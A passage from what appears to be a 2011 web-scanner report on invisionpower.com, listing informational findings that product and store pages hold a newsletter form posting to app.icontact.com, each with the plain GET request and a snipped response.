Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=b29a6b78fc93b0263db0ec46b596aa2c; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16942

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.23. http://www.invisionpower.com/products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=8f13a8623634329d7f2fe9882f5a4a6f; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16664

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.24. http://www.invisionpower.com/products/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/blog/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/blog/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=51c4c66d63a3c2f41af18def7b1ef3ae; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:10 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16921

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.25. http://www.invisionpower.com/products/board/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/board/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/board/ HTTP/1.1
Host: www.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ipboard+software
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:24:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:24:56 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19890

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.26. http://www.invisionpower.com/products/board/features/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/board/features/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/board/features/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:15:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=f958117f077b1a8660b6cb96ee28e38b; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:15:59 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16424

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.27. http://www.invisionpower.com/products/board/purchase.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/board/purchase.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/board/purchase.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=2c26d803903684e15cd1235dc7fdcd14; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:04 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14048

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.28. http://www.invisionpower.com/products/board/whats_new.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/board/whats_new.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/board/whats_new.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=6d3a7133394b65664b59743ef7d1fee2; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:04 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18050

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.29. http://www.invisionpower.com/products/chat/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/chat/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/chat/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=c69a63c6707169c101f068a4782c4473; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13676

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.30. http://www.invisionpower.com/products/content/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/content/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/content/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=48dd77c8db9b009e222adae90414e4f1; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:10 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17701

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.31. http://www.invisionpower.com/products/converge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/converge/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/converge/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 01:16:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=e0c5e8c8c448d61483e98330d7b3da2b; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:17 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13729

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.32. http://www.invisionpower.com/products/downloads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/downloads/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/downloads/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=9a9b9845bc525df7d2c8d1b013c86eae; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18118

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.33. http://www.invisionpower.com/products/gallery/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/gallery/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/gallery/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=c295d8a9fdb29fec433b0f14fa4a0151; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:10 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17131

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.34. http://www.invisionpower.com/products/nexus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/nexus/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/nexus/ HTTP/1.1
Host: www.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:26:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:26:21 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19027

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.35. http://www.invisionpower.com/products/nexus/features/store.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/nexus/features/store.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/nexus/features/store.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=0c2050c202c9aeebf9cf21831c9647e6; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14859

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.36. http://www.invisionpower.com/products/spammonitor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /products/spammonitor/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /products/spammonitor/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=b170b6b1e7b2697199120e4d67dbeedc; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:16 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16807

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.37. http://www.invisionpower.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=c07f3ba3d744b4f235b7d280b0a14789; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:26 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23290

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.38. http://www.invisionpower.com/store/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /store/index.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /store/index.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=a67c7376f13958f764541db443d9b0fe; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:26 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23290

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
